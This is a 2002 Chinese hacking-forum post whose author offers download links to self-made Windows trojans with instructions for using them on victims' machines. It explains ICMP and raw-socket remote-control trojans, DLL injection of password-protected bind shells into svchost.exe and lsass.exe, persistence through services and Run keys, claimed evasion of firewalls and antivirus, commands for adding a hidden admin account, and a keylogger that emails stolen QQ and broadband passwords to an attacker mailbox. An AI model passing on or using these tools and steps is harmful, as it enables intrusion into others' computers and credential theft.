mf117 
级别:精灵王
威望:0
经验:0
货币:2217
体力:
来源:61.183.75.*
总发帖数:362
注册日期:2002-03-27
|
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
[http://61.183.19.100/icmp_muma.rar
这是一个基于ICMP原理木马,适用于win2000和XP
作者:mf117
EMAIL:mf117@etang.com
下面是常用的命令的举例说明:
1>
添加一个Admin用户:
net user user6 pass /add
net localgroup
administrators user6 /add
2> 执行一个GUI程序:
calc.exe
3> 执行一个命令行程序:
cmd /c dir c:\ > c:\66.txt
4>
重启计算机:
iisreset/reboot
5> 打开远程SHELL:
start_shell
6> 注入远程SHELL:
start_lsass_shell
~~~~~~~~~~~~~~~~~~~~信息框中的内容说明~~~~~~~~~~~~~~~~~~~~~~~~~
如果在本机IP地址:选择了 [客户端]和[服务端]在同一个网络的IP
[客户端]一条命令发送成功显示:Send
Packet Success!
[服务端]执行命令成功,向[客户端]发送:Command Success!
[客户端]就会收到此信息,并显示:Command Success!
如果在本机IP地址:选择了
[客户端]和[服务端]不同网络的IP
[客户端]一条命令发送成功显示:Send Packet Success!
[服务端]执行命令成功,向[客户端]发送:Command Success!
[客户端]就永远不会收到此信息,所以就不会显示:Command Success!
但是[客户端]发送的命令,[服务端]是执行了!!
Other ICMP Packets!
表示[客户端]收到了ICMP包,但是此包不是我们的!
你在[客户端]的机器上ping自己就会收到这个信息。
~~~~~~~~~~~~~~~~~~~~start_shell命令说明~~~~~~~~~~~~~~~~~~~~~~~~~
打开远程SHELL ,端口号是:1168 密码: abc123
你可以 telnet ip 1168 来控制对方计算机。
每次只允许一个用户联结,exit命令退出并关闭SHELL。
~~~~~~~~~~~~~~~~~~~~start_lsass_shell命令说明~~~~~~~~~~~~~~~~~~~~~~~
注入远程SHELL ,端口号是:1186 不需要密码
你可以 telnet ip 1186 来控制对方计算机。
每次只允许一个用户联结,并且SHELL不可以关闭
由于把自己注入lsass.exe中,所以本服务进程被kill
你可以用命令 icmp_s.exe -method2 再次启动服务程序
~~~~~~~~~~~~~~~~~~~~命令的长度说明~~~~~~~~~~~~~~~~~~~~~~~~~~~
要发送命令的长度<=52字节(byte)
~~~~~~发现BUG请给我来信:
mf117@etang.com~~~~~~
[http://61.183.19.100/dll_new.rar
《兼容性》
注入Dll到exe文件, 实用与win98,win2000,winXP系统。
Shell安装成服务,
实用与win2000,winXP系统。
//////////////////////////////////////////////////////////////////
《使用说明》
假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt
1. 把 iNetPub.dll 和
dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。
4.
Dll_in.exe -exe
c:\winnt\system32\svchost.exe
在系统进程中开一个 shell;
< 端口:1193 密码:abc123>
5.
telnet 192.168.0.66
1193
密码:abc123
6.
你 用fport 可以查看,1193端口 在
svchost.exe下(系统进程中开一个 shell)
7.
Dll_in.exe -exe
c:\winnt\system32\svchost.exe
或
Dll_in.exe -exe
c:\winnt\system32\servers.exe
或
Dll_in.exe -exe
c:\winnt\system32\lsass.exe
或
Dll_in.exe -exe
c:\winnt\system32\calc.exe
或
Dll_in.exe -exe
c:\winnt\system32\telnet.exe
用一个即可。
因为,shell开的端口固定为1193,只有第一个开的shell采起作用。
/////////////////////////////////////////////////////////////////////////////
《修改原理是》
改变svchost.exe他的文件头,如果win2000,winXP没有对关键的文件有恢复机制,
下次win2000,winXP启动,shell仍然起作用,否则下次win2000,winXP启动, shell失效。
win98下永远有效。
///////////////////////////////////////////////////////////////////////////////
《解决win2000,winXP再启动shell失效的方法:》
插入Shell为服务的形式,
a>把shell以服务的形式注入到servers.exe文件中
Dll_in.exe
-install c:\winnt\system32\servers.exe
这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在
servers.exe下(在系统进程中开了一个 shell)。
b>如果想把shell以服务的形式注入到svchost.exe文件中
<1>先卸载服务
Dll_in.exe -remove
<2>安装注入Shell的服务
Dll_in.exe
-install c:\winnt\system32\svchost.exe
这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在
svchost.exe下(在系统进程中开了一个 shell)。
[http://61.183.19.100/dll.rar
在系统进程中插入SHELL
假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt
1. 把 iNetPub.dll 和
dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。
4.
Dll_in.exe
c:\winnt\system32\svchost.exe
在系统进程中开一个 shell;
< 端口:1193 密码:abc123>
5.
telnet 192.168.0.66
1193
密码:abc123
6.
你 用fport 可以查看,1193端口 在
svchost.exe下(系统进程中开一个 shell)
7.
Dll_in.exe
c:\winnt\system32\svchost.exe
或
Dll_in.exe
c:\winnt\system32\servers.exe
或
Dll_in.exe
c:\winnt\system32\lsass.exe
或
Dll_in.exe
c:\winnt\system32\calc.exe
或
Dll_in.exe
c:\winnt\system32\telnet.exe
用一个即可。
因为,shell开的端口固定为1193,只有第一个开的shell采起作用。
8.
修改原理是:
改变svchost.exe他的文件头,如果win2000没有对关键的文件有恢复机制,
下次win2000启动,shell仍然起作用,否则下次win2000启动, shell失效。
[http://61.183.19.100/raw.rar
原始套接字木马新版
这是一个基于嗅探原理的原始套接字木马
适用于win2000和XP
该方式的优点:完全基于非连接状态,使用原始包进行
通讯,不同协议有关,可使用任意协议。
作者:mf117
EMAIL:mf117@etang.com
下面是常用的命令的举例说明:
1> 添加一个Admin用户:
net user user6 pass /add
net
localgroup administrators user6 /add
2> 执行一个GUI程序:
calc.exe
3> 执行一个命令行程序:
cmd /c dir c:\ > c:\66.txt
4> 重启计算机:
iisreset/reboot
5> 打开远程SHELL:
start_shell
说明:以上的命令只有 5> 打开远程SHELL 是我的
程序提供的功能,端口号是:3371
你可以 telnet ip 3371 来控制对方计算机。密码:abc123
每次只允许一个用户联结,exit命令退出并关闭SHELL。
发现BUG请给我来信: mf117@etang.com
http://61.183.19.100/raw_muma.rar
原始套接字木马
raw_c.exe 为客户端,raw_s.exe为服务端。
该木马优点:完全基于非连接状态,使用原始包进行通讯,不同协议有关,可实现部分的隐藏地址(如果是非交换的局域网则是可以完全的隐藏地址)、可实现无连接反向通讯、甚至能够突破一些防火墙的监视。
安装简单,raw_s.exe直接运行即可,我做了实验,可以通过天网,金山毒霸,等放火墙。
我采用
服务+注册表双重隐藏raw_s.exe,用于知道的固定IP的计算机上安装此木马。
http://61.183.19.100/mail_new.rar
在命令行下:
1> kp -install -->安装成服务,每次为自启动 (对
win200、win XP 有效)
2> kp -method2 -->在 /RUN 下使他为自启动 (对
win98、win200、win XP 有效)
3> kp -->安装成服务和在 /RUN 下使他为自启动
如:QQ 、宽带 Enterner上网、www.yahoo.com.cn、的密码都可以发送。
如:QQ 、宽带 Enterner上网、www.yahoo.com.cn、的密码都可以发送。
实用于 win98 、win2000、 win xp系统。
1. 把
win32vxd.dll 拷贝到 c:\win98\system 或 c:\winnt\system32目录下。
2.
安装说明:
kp.exe -method2 和 kp.exe -install 使应用程序有双引导功能。
密码记录功能 :文件名为 c:\winnt\system32\win32pwd.sys (记录密码的文件)
密码记录功能 :文件名为 c:\winnt\system32\win32add.sys (记录email的文件)
|
3. setup.exe邮件修改器e-mail服务的方法如下:
比如:向e-mail地址:abcde66@163.com发邮件,
在 www.etang.com申请邮箱为
hacker@etang.com
密码为:etang666
smtp服务器地址: smtp.etang.com
我们知道需要密码验证。
--smtp服务器-----------------------———
|发件服务器(SMTP)
smtp.etang.com |
| _ _____ |
| |X| 我的服务器需要密码验证 |设置 |
------->帐号名: hacker
------------------------———————— 密码 :
etang666
---------------- 电子邮件地址: hacker@etang.com
收件人电子邮件地址:abcde66@163.com
__________
配置文件名:.........
| 打开...|----->选择win32vxd.dll
—————
选 Ok 成功。
不需要 密码验证的 e-mail:
也要选中
|X|
我的服务器需要密码验证
里面的内容随便填写!!!
一个bug!!
bbbbbb>
把 win32vxd.dll 和 kp.exe
必须拷贝到win2000、win XP、win98的系统目录下,
即x:\winnt\system32、x:\winxp\system32、x:\win98\system目录下
cccccc>
在命令行下:
1> kp -install
-->安装成服务,每次为自启动 (对 win200、win XP 有效)
2> kp -method2
-->在 /RUN 下使他为自启动 (对 win98、win200、win XP 有效)
新增特性:
dddddd>
自动开一个shell 端口号:1198 密码:abc123
eeeeee>
50分钟 自动发送 win32pwd.sys 文件的内容。
ffffff>
一有密码实时 发送。
你收到的信息如下:
|
首页 
小榕软件实验室 
刀光雪影 
ICMP木马
!! 
将此页发给您的朋友
编辑
删除
发表于
2002-12-08.17:56:01 
IP: 
